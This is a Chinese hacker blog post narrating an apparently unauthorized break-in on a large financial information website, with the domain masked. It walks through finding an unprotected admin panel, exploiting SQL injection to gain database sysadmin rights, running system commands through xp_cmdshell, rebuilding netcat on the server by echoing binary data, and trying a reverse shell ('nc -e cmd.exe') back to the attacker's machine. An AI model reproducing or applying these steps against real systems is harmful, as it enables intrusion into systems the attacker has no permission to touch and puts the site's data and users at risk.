by 阿呆 站点:www.***.com.cn   (地址我屏蔽了) 文章目的：仅做技术交流，无其他用意 起因：纯粹无聊 Go`````   www.***.com.cn是国内一家比较著名的金融信息站点，其站点规模也是十分庞大的！曾被国内CCTV等多家媒体报道，今天无意中路过此站，便无聊想检测一下，不晓得他的安全是否跟他的知名度同样呢``` 站点的构造是我见过最变态的一个，脚本由ASP，.net,JSP组成 对站点大概的扫描了下，由于服务器设置了500报错，所以不管任何的POST 都返回200报告，所以想通过扫描挖掘深层敏感目录是没戏了``` 开始对脚本进行检测，GOOGLE   site:***.com.cn inur:jsp asp aspx   后 都没检测到注射 意料之内，开始对各个副站逐一检查```` 因为此次讲得是脚本检测，所以对服务器检测过程略过 在经过漫长的检测后，目标锁定下站点的 读书频道book.***.com.cn   这个频道采用的是ASP脚本 已经彻底检查过了，没有发现上传注射等漏洞```` 接着对各各连接一个一个点过去，然后查看GET 数据包```   很意外的发现了一个比较隐蔽的目录    u_adlogin/upload/   来源是个图片连接``````一看就知道是个上传模块，一般上传模块都在后台使用的，如果没猜错的话u_adlogin 就是后台目录了```` 开始手工猜后台， admin,admin.asp,login.asp,main.asp,member,manage！   GOOD manage跳出个后台登陆，试了下弱口令和OR都不行 正常~   接着提交manage/left.asp manage/top.asp, manage/main.asp manage/admin.asp （很多朋友可能会奇怪，为什么我会提交这些，因为有些站的后台 有分栏设置，而这些分栏文件一般是没有做COOKIE或siession验证的，但是他们的功能只是普通的导航而已）manage/admin.asp 终于跳出个菜单导航来了，有图书管理，图书编辑，图片管理，图片上传，管理员管理等````用迅雷下载全部，发现图书编辑的URL是/HTMLEditor/editput.asp 点进去，很好没有做cookie验证```` 随便点了本图书，跳出个文本编辑器，但很意外的是这个编辑器不同于其他编辑器是HTML，它是ASP的HTMLEditor/editbox.asp?id=13755 随手加了个’ Microsoft OLE DB Provider for SQL Server error '80040e14' 字符串 '' 之前有未闭合的引号。 /manage/HTMLEditor/editbox.asp, line 77 天哪，传说中的后台注射让我遇到了，RP真不错呀！！！ 丢到NBSI里跑了下，竟然是sysadmin

得到SA后，马上检测扩展储存是否完好
exec master.dbo.xp_cmdshell 'echo adai c:\adai.txt';--
接这列C盘目录，发现adai.txt顺利写入！看来xpcmdshell是可以直接利用了•••
先看下服务器开了哪些服务，net start
发现开了终端，但并没有发现有IIS服务•••难道？马上ipconfig ，果然Web与DATA分离了•••
Netstat –an下发现都是C段连接本机1433的信息，其中包括了主站，和大部分分站的IP。看来这个服务器是不仅是读书频道的数据库服务器，还是整个站点的通过存储数据库了，GOOD！

思路很简单了，拿下DATA服务器后，试着靠DATA服务器上的数据库对主站进行渗透，如果失败就sniffer C段下的所有服务器，因为arp –a 返回的消息证明可以直接sniffer了
既然开了终端，马上mastsc，结果显示连接失败，明明是外网，netstat –an也发现有3389的端口，难道？ 马上net start，果然，做了IP策略，并仔细观察了下其他服务，没有发现防火墙，杀软等

从服务器的整体结构来看，估计这个IP策略是做到家了，马上扫描DATA服务器，结果发现只有21端口开放，并且21对应的并不是FTP•••也没有对应其他服务，这是怎么回事？先放着不管

思路：既然服务器做了IP策略，那我就反弹个shell回来，然后吧终端映射到本机，然后创建用户OVER之~~~

先传个NC上去，马上ECHO个VBS上去，cscript执行，结果返回报错c:\d.vbs(4, 3) msxml3.dll: The system cannot locate the resource specified.
Msxml3出错？估计是xmlhttp做了限制，试着重新注册下，然后再次cscript，仍然出错，没戏•••
又试着写了个FTP下载脚本，然后ftp –s:ftp.txt 结果显示time out ..试了几次还是一样！！难道RP出问题了？

NBSI自带的上传就别说了，二进制下文件扩充了一倍！

可能有些朋友会说，不会sp_addlogin个用户，然后用sqltools上传….请注意上面的扫描报告！
顿时陷入僵局，连文件都传不上去就别说反弹shell了….
点根烟，整理思路````
对了，我不是可以ECHO么，可以吧EXE转换成BAT然后ECHO 转换后的代码让他恢复成exe文件，这个exe2bat就可以搞定了••••

于是开始不断的ECHO- - 直到手快麻痹时，终于完成了，dir nc.exe
Volume in drive C has no label.
Volume Serial Number is 30A3-10C5

Directory of C:\WINDOWS\system32

2008-05-08 11:24 28,160 nc.exe
1 File(s) 28,160 bytes
0 Dir(s) 7,018,565,632 bytes free
终于传上去了，马上本地监听69端口，服务器上执行 nc –e cmd.exe xxx.xxx.xxx.xx 69
结果等了半天本机都没反应，服务器上tasklist下，发现NC已经顺利执行了，netstat –an却没有发现 69端口的连接信息。。。难道服务器无网络？
试着ping www.baidu.com
Pinging www.a.shifen.com [220.181.37.55] with 32 bytes of data:
Reply from 220.181.37.55: bytes=32 time=1ms TTL=55
Reply from 220.181.37.55: bytes=32 time=2ms TTL=55
Reply from 220.181.37.55: bytes=32 time=1ms TTL=55
Reply from 220.181.37.55: bytes=32 time=1ms TTL=55
Ping statistics for 220.181.37.55:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 1ms, Maximum = 2ms, Average = 1ms
没问题呀，可以上网••••
telnet 本机的 69端，失败••••
联想起刚才的FTP ：time out 终端没反应，以及VBS和现在的telnet••••顿时倒吸口冷气，难道服务器是对C段外的所有TCP数据包做了屏蔽？如果是这样，按一般的渗透的思路都将失败- -
但是却可以PING，这么说 对 ICMP数据包没有屏蔽了，思路还是有的，把ICMP包和TCP数据包进行转换，这方法在朋友那听说过，涉及到汇编下对包的拆分再封装，可我偏偏对汇编感冒~~~
看来只能放弃DATA服务器了••••
不过，还没结束，思路是可以逆转的嘛~~~~HOHO